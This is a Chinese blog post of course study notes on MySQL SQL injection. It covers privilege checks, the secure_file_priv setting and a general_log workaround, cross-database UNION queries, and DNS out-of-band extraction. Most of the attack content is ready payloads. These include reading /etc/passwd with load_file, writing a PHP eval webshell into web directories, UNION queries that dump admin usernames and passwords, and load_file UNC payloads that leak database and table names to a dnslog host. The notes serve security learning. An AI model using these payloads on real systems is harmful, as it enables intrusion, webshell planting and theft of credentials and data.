<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"zhigao.xyz","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"livere","storage":true,"lazyload":false,"nav":null,"activeClass":"livere"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta property="og:type" content="article">
<meta property="og:title" content="第57天-SQL注入&amp;高权限判定&amp;跨库查询&amp;文件读写&amp;DNS带外&amp;SecurePriv开关绕过">
<meta property="og:url" content="http://zhigao.xyz/2026/07/30/%E7%AC%AC57%E5%A4%A9-SQL%E6%B3%A8%E5%85%A5-%E9%AB%98%E6%9D%83%E9%99%90%E5%88%A4%E5%AE%9A-%E8%B7%A8%E5%BA%93%E6%9F%A5%E8%AF%A2-%E6%96%87%E4%BB%B6%E8%AF%BB%E5%86%99-DNS%E5%B8%A6%E5%A4%96-SecurePriv%E5%BC%80%E5%85%B3%E7%BB%95%E8%BF%87/index.html">
<meta property="og:site_name" content="Voyage Memo">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2026-07-30T02:59:39.000Z">
<meta property="article:modified_time" content="2026-07-30T03:00:21.229Z">
<meta property="article:author" content="智高">
<meta property="article:tag" content="笔记">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://zhigao.xyz/2026/07/30/%E7%AC%AC57%E5%A4%A9-SQL%E6%B3%A8%E5%85%A5-%E9%AB%98%E6%9D%83%E9%99%90%E5%88%A4%E5%AE%9A-%E8%B7%A8%E5%BA%93%E6%9F%A5%E8%AF%A2-%E6%96%87%E4%BB%B6%E8%AF%BB%E5%86%99-DNS%E5%B8%A6%E5%A4%96-SecurePriv%E5%BC%80%E5%85%B3%E7%BB%95%E8%BF%87/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>第57天-SQL注入&高权限判定&跨库查询&文件读写&DNS带外&SecurePriv开关绕过 | Voyage Memo</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Voyage Memo</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://zhigao.xyz/2026/07/30/%E7%AC%AC57%E5%A4%A9-SQL%E6%B3%A8%E5%85%A5-%E9%AB%98%E6%9D%83%E9%99%90%E5%88%A4%E5%AE%9A-%E8%B7%A8%E5%BA%93%E6%9F%A5%E8%AF%A2-%E6%96%87%E4%BB%B6%E8%AF%BB%E5%86%99-DNS%E5%B8%A6%E5%A4%96-SecurePriv%E5%BC%80%E5%85%B3%E7%BB%95%E8%BF%87/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/photo.jpg">
      <meta itemprop="name" content="智高">
      <meta itemprop="description" content="正因为我有能力跨越，这个考验才会降临!">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Voyage Memo">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          第57天-SQL注入&高权限判定&跨库查询&文件读写&DNS带外&SecurePriv开关绕过
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2026-07-30 10:59:39 / 修改时间：11:00:21" itemprop="dateCreated datePublished" datetime="2026-07-30T10:59:39+08:00">2026-07-30</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%E8%AF%BE%E7%A8%8B%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-web%E6%94%BB%E9%98%B2/" itemprop="url" rel="index"><span itemprop="name">小迪安全课程学习笔记(web攻防)</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><font></font></p>
<span id="more"></span>



<p><font style="color:#ff0000;background-color:#ffff00;">演示案例：</font></p>
<p><font style="color:#ff0000;background-color:#ffffff;">➢ WEB攻防-SQL注入-高权限&amp;跨库&amp;文件读写</font></p>
<p><font style="color:#ff0000;background-color:#ffffff;">➢ WEB攻防-SQL注入-高权限&amp;文件读写&amp;带外</font></p>
<p><font style="color:#ff0000;background-color:#ffffff;"></font></p>
<p>案例说明：</p>
<p>在应用中，数据库用户不同，可操作的数据库和文件读写权限不一，所有在注入过程中可以有更多的利用思路，如直接写入后门，获取数据库下洽谈网站的数据等。</p>
<h1 id="root用户和普通用户权限差异-mysql"><a href="#root用户和普通用户权限差异-mysql" class="headerlink" title="root用户和普通用户权限差异(mysql)"></a>root用户和普通用户权限差异(mysql)</h1><h2 id="1、文件读写操作权限"><a href="#1、文件读写操作权限" class="headerlink" title="1、文件读写操作权限"></a>1、文件读写操作权限</h2><p>root权限下有文件读写权限，普通用户没有(默认情况，排除管理员授权的情况)</p>
<blockquote>
<h3 id="读写操作讲解（LOAD-FILE-和-INTO-OUTFILE）"><a href="#读写操作讲解（LOAD-FILE-和-INTO-OUTFILE）" class="headerlink" title="读写操作讲解（LOAD_FILE () 和 INTO OUTFILE）"></a>读写操作讲解（<font style="background-color:rgba(0, 0, 0, 0);">LOAD_FILE () 和 INTO OUTFILE</font>）</h3><p><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">LOAD_FILE () 和 INTO OUTFILE，二者是 MySQL 用于文件读写，SQL 注入高频函数，都依赖 FILE 权限 + secure_file_priv</font></p>
<p><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">函数：LOAD_FILE (绝对路径) </font></p>
<p><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">作用：读取磁盘上文件内容，把文件内容当做字符串返回。  </font></p>
<p><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">sql：</font></p>
<p><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">select load_file(‘&#x2F;etc&#x2F;passwd’);</font></p>
<p><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">selectload_file(‘C:\windows\system32\drivers\etc\hosts’);</font></p>
<p><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">INTO OUTFILE 它不是函数，是 select 的子句，不是独立函数！这点面试非常爱考。 作用：把 select 查询结果写入服务器磁盘文件。</font></p>
<p><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">sql：select ‘<?php eval($_POST[cmd]);?>‘ into outfile ‘&#x2F;tmp&#x2F;shell.php’;</font></p>
</blockquote>
<h2 id="2、数据库名获取"><a href="#2、数据库名获取" class="headerlink" title="2、数据库名获取"></a>2、数据库名获取</h2><p>同个数据库服务器下<font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">默认 root 可查看所有数据库，普通用户能否看见数据库由权限决定，并非只能看到自己管理的库(也就是说管理员让他看到什么就能看到什么)。</font></p>
<h3 id="课外拓展"><a href="#课外拓展" class="headerlink" title="课外拓展"></a>课外拓展</h3><p><font style="color:#ED740C;">我们通过一个网站拿下数据库，数据库内有其他站点的数据库，能获取到对应的账户密码，但是不知道其他站点对应的url怎么办，有什么思路</font></p>
<p><font style="color:#81BBF8;background-color:rgba(0, 0, 0, 0);">答：web 配置表 很多网站数据库会保存网站域名、站点 URL、后台地址、base_url、siteurl 字段。搜索表字段：url、domain、site、host、weburl。CMS 一般存于系统配置表，比如config、setting、system_config。  </font></p>
<p><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);"></font></p>
<p><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);"></font></p>
<h1 id="secure-file-priv开关"><a href="#secure-file-priv开关" class="headerlink" title="secure_file_priv开关"></a>secure_file_priv开关</h1><p>show variables like”secure%”</p>
<p>通过my.ini(windows版本)&#x2F;my.cnf(Linux版本)中设置</p>
<h2 id="secure-file-priv是MySQL中的系统变量，用于限制文件的读取和写入"><a href="#secure-file-priv是MySQL中的系统变量，用于限制文件的读取和写入" class="headerlink" title="secure_file_priv是MySQL中的系统变量，用于限制文件的读取和写入"></a>secure_file_priv是MySQL中的系统变量，用于限制文件的读取和写入</h2><p><font style="color:rgb(0, 0, 0);background-color:#FBDE28;">secure_file_priv &#x3D; NULL</font><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);"> 彻底禁用读写，任何路径都不能操作，root 也不行。</font></p>
<p><font style="color:rgb(0, 0, 0);background-color:#FBDE28;">secure_file_priv &#x3D; “”</font><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">（空字符串） 没有目录限制，有权限 (FILE 权限) 就可以读写任意目录。</font></p>
<p><font style="color:rgb(0, 0, 0);background-color:#FBDE28;">secure_file_priv &#x3D; “&#x2F;tmp”</font><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">（指定路径）只允许在该指定目录下做文件读写，只能读写 &#x2F;tmp 下面，不能读写别的目录。</font><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">✅</font><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">就是你说的这条。</font></p>
<p><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);"></font></p>
<p>绕过条件：存在可执行的SQL地方（后台SQL命令执行，Phpmyadmin应用等）</p>
<p>从后台的sql命令执行功能点：注入获取得到这个网站的后台账号密码</p>
<p>从phpmyadmin命令执行功能点：注入获取到数据库的用户名和密码</p>
<p>存储在mysql数据库下user(用户字段)(password或authentication_string是密码字段)</p>
<p>show variables like’general_log’;</p>
<p>setglobal general_log&#x3D;on;</p>
<p>setglobal general_log_file&#x3D;’D:&#x2F;phpstudy_pro&#x2F;WWW&#x2F;php&#x2F;55&#x2F;bypass.php’;</p>
<p>select’<?php @eval($_POST[x]);?>‘</p>
<p><a target="_blank" rel="noopener" href="https://wiki.wgpsec.org/knowledge/web/mysql-write-shell.html">https://wiki.wgpsec.org/knowledge/web/mysql-write-shell.html</a>参考</p>
<h1 id="跨库注入："><a href="#跨库注入：" class="headerlink" title="跨库注入："></a>跨库注入：</h1><p>查数据库名：</p>
<p>‘ union select SCHEMA_name,2,3 from information_schema.SCHEMATA#</p>
<p>查表名：</p>
<p>‘unionselect table_name,2,3from information_schema.tableswhere table_schema&#x3D;’aicms’#</p>
<p>查列名：</p>
<p>‘ union select column_name,2,3 from information_schema.columns where table_name&#x3D;’wolive_admin’#</p>
<p>查数据：</p>
<p>‘union select username,2,3from aicms.wolive_admin#</p>
<p>‘union select password,2,3 from aicms.wolive_admin#</p>
<h2 id="文件操作："><a href="#文件操作：" class="headerlink" title="文件操作："></a>文件操作：</h2><p>关于网站路径获取方法：</p>
<p>1、遗留文件</p>
<p>比如phpinfo这类文件，里面会泄露</p>
<p>2、报错显示</p>
<p>网站的报错信息有可能显示网站路径</p>
<p>3、读中间件配置 </p>
<p>通过读取操作来读中间件默认路径</p>
<p>4、爆破fuzz路径（纯运气）</p>
<p>‘union select LOAD_FILE(‘d:\1.txt’),2,3#</p>
<p>‘union select ‘xxxx’,2,3 into outfile ‘d:\3.txt’#</p>
<h1 id="带外注入："><a href="#带外注入：" class="headerlink" title="带外注入："></a>带外注入：</h1><p>yakit自带dnslog</p>
<p>查数据名：</p>
<p>‘union select load_file(concat(‘\\‘,(select database()),’.yjjoxijrhw.yutu.eu.org\aa’)),2,3#</p>
<p>concat(‘\\‘,(select database()),’.yjjoxijrhw.yutu.eu.org\aa’)这里是构造了一个unc格式，<font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">Windows 专用网络路径格式</font>，用来访问局域网共享文件夹，格式： \服务器主机名\共享名  </p>
<p><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">load_file本意：读取一个文件内容。传入 UNC 网络共享路径，就是告诉 MySQL：去读取 Windows 网络共享上面的文件</font><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">。</font></p>
<h3 id="执行全过程（Windows-系统）（带外注入核心）："><a href="#执行全过程（Windows-系统）（带外注入核心）：" class="headerlink" title="执行全过程（Windows 系统）（带外注入核心）："></a><font style="color:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);">执行全过程（Windows 系统）（带外注入核心）：</font></h3><p><font style="color:rgb(0, 0, 0);background-color:#FBDE28;">1、MySQL 拿到字符串 \xxx.dnslog\aa，识别这是一条 UNC 网络共享路径。</font></p>
<p><font style="color:rgb(0, 0, 0);background-color:#FBDE28;">2、MySQL 把这个路径交给 Windows 操作系统。</font></p>
<p><font style="color:rgb(0, 0, 0);background-color:#FBDE28;">3、Windows 第一件事：对域名 xxx.dnslog 做 DNS 解析（向公网 DNS 服务器发起请求）。</font></p>
<p><font style="color:rgb(0, 0, 0);background-color:#FBDE28;">重点：不管这个共享到底存不存在，域名解析这一步一定会执行。</font></p>
<p><font style="color:rgb(0, 0, 0);background-color:#FBDE28;">4、Windows 尝试连接这个网络共享，肯定访问失败。</font></p>
<p><font style="color:rgb(0, 0, 0);background-color:#FBDE28;">5、load_file 读取失败，函数返回NULL给 SQL。</font></p>
<p><font style="color:rgb(0, 0, 0);background-color:#FBDE28;">✅</font><font style="color:rgb(0, 0, 0);background-color:#FBDE28;">核心：虽然读文件失败，但是第 3 步 DNS 请求已经发出，放在子域名里面的数据，已经发送到 DNS‑Log 服务器，实现不带回显的数据外带。</font></p>
<p>查表名1：</p>
<p>‘ union select load_file(concat(“\\“,(select table_name from information_schema.tables where table_schema&#x3D;’news_management’ limit 0,1 ),”.yjjoxijrhw.yutu.eu.org\xxx.txt”)),2,3#</p>
<p>查表名2：</p>
<p>‘union select load_file(concat(“\\“,(select table_name from information_schema.tableswhere table_schema&#x3D;’news_management’limit0,2),”.yjjoxijrhw.yutu.eu.org\xxx.txt”)),2,3#</p>
<p>查列名：……同理</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E7%AC%94%E8%AE%B0/" rel="tag"># 笔记</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/07/30/%E7%AC%AC56%E5%A4%A9-SQL%E6%B3%A8%E5%85%A5-%E5%A2%9E%E5%88%A0%E6%94%B9%E6%9F%A5-%E7%9B%B2%E6%B3%A8-%E5%BB%B6%E6%97%B6-%E5%B8%83%E5%B0%94-%E6%8A%A5%E9%94%99-%E6%9C%89%E6%97%A0%E5%9B%9E%E6%98%BE-%E9%94%99%E8%AF%AF%E5%A4%84%E7%90%86-%E5%AE%A1%E8%AE%A1%E5%A4%8D%E7%9B%98/" rel="prev" title="第56天-SQL注入&增删改查&盲注&延时&布尔&报错&有无回显&错误处理&审计复盘">
      <i class="fa fa-chevron-left"></i> 第56天-SQL注入&增删改查&盲注&延时&布尔&报错&有无回显&错误处理&审计复盘
    </a></div>
      <div class="post-nav-item">
    <a href="/2026/08/07/%E7%AC%AC58%E5%A4%A9-SQL%E6%B3%A8%E5%85%A5-%E4%BA%8C%E6%AC%A1%E6%94%BB%E5%87%BB-%E5%A0%86%E5%8F%A0%E6%89%A7%E8%A1%8C-SQLMAP-Tamper%E7%BC%96%E5%86%99-%E6%8C%87%E7%BA%B9%E4%BF%AE%E6%94%B9-%E5%88%86%E6%9E%90%E8%B0%83%E8%AF%95/" rel="next" title="第58天-SQL注入&二次攻击&堆叠执行&SQLMAP&Tamper编写&指纹修改&分析调试">
      第58天-SQL注入&二次攻击&堆叠执行&SQLMAP&Tamper编写&指纹修改&分析调试 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    
  <div class="comments">
    <div id="lv-container" data-id="city" data-uid="w0aFeK3v2HV9LRG7Ubh6"></div>
  </div>
  

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>


<livere-comment client-id="w0aFeK3v2HV9LRG7Ubh6"></livere-comment>
<script type="module" src="https://www.livere.org/livere-widget.js"></script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#root%E7%94%A8%E6%88%B7%E5%92%8C%E6%99%AE%E9%80%9A%E7%94%A8%E6%88%B7%E6%9D%83%E9%99%90%E5%B7%AE%E5%BC%82-mysql"><span class="nav-number">1.</span> <span class="nav-text">root用户和普通用户权限差异(mysql)</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1%E3%80%81%E6%96%87%E4%BB%B6%E8%AF%BB%E5%86%99%E6%93%8D%E4%BD%9C%E6%9D%83%E9%99%90"><span class="nav-number">1.1.</span> <span class="nav-text">1、文件读写操作权限</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%AF%BB%E5%86%99%E6%93%8D%E4%BD%9C%E8%AE%B2%E8%A7%A3%EF%BC%88LOAD-FILE-%E5%92%8C-INTO-OUTFILE%EF%BC%89"><span class="nav-number">1.1.1.</span> <span class="nav-text">读写操作讲解（LOAD_FILE () 和 INTO OUTFILE）</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2%E3%80%81%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E8%8E%B7%E5%8F%96"><span class="nav-number">1.2.</span> <span class="nav-text">2、数据库名获取</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%AF%BE%E5%A4%96%E6%8B%93%E5%B1%95"><span class="nav-number">1.2.1.</span> <span class="nav-text">课外拓展</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#secure-file-priv%E5%BC%80%E5%85%B3"><span class="nav-number">2.</span> <span class="nav-text">secure_file_priv开关</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#secure-file-priv%E6%98%AFMySQL%E4%B8%AD%E7%9A%84%E7%B3%BB%E7%BB%9F%E5%8F%98%E9%87%8F%EF%BC%8C%E7%94%A8%E4%BA%8E%E9%99%90%E5%88%B6%E6%96%87%E4%BB%B6%E7%9A%84%E8%AF%BB%E5%8F%96%E5%92%8C%E5%86%99%E5%85%A5"><span class="nav-number">2.1.</span> <span class="nav-text">secure_file_priv是MySQL中的系统变量，用于限制文件的读取和写入</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%B7%A8%E5%BA%93%E6%B3%A8%E5%85%A5%EF%BC%9A"><span class="nav-number">3.</span> <span class="nav-text">跨库注入：</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C%EF%BC%9A"><span class="nav-number">3.1.</span> <span class="nav-text">文件操作：</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%B8%A6%E5%A4%96%E6%B3%A8%E5%85%A5%EF%BC%9A"><span class="nav-number">4.</span> <span class="nav-text">带外注入：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%89%A7%E8%A1%8C%E5%85%A8%E8%BF%87%E7%A8%8B%EF%BC%88Windows-%E7%B3%BB%E7%BB%9F%EF%BC%89%EF%BC%88%E5%B8%A6%E5%A4%96%E6%B3%A8%E5%85%A5%E6%A0%B8%E5%BF%83%EF%BC%89%EF%BC%9A"><span class="nav-number">4.0.1.</span> <span class="nav-text">执行全过程（Windows 系统）（带外注入核心）：</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="智高"
      src="/images/photo.jpg">
  <p class="site-author-name" itemprop="name">智高</p>
  <div class="site-description" itemprop="description">正因为我有能力跨越，这个考验才会降临!</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">35</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Spider-px" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Spider-px" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">智高</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>



        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script color='0,0,0' opacity='0.7' zIndex='' count='90' src="/lib/canvas-nest/canvas-nest-nomobile.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<script>
NexT.utils.loadComments(document.querySelector('#lv-container'), () => {
  window.livereOptions = {
    refer: location.pathname.replace(CONFIG.root, '').replace('index.html', '')
  };
  (function(d, s) {
    var j, e = d.getElementsByTagName(s)[0];
    if (typeof LivereTower === 'function') { return; }
    j = d.createElement(s);
    j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
    j.async = true;
    e.parentNode.insertBefore(j, e);
  })(document, 'script');
});
</script>

</body>
</html>
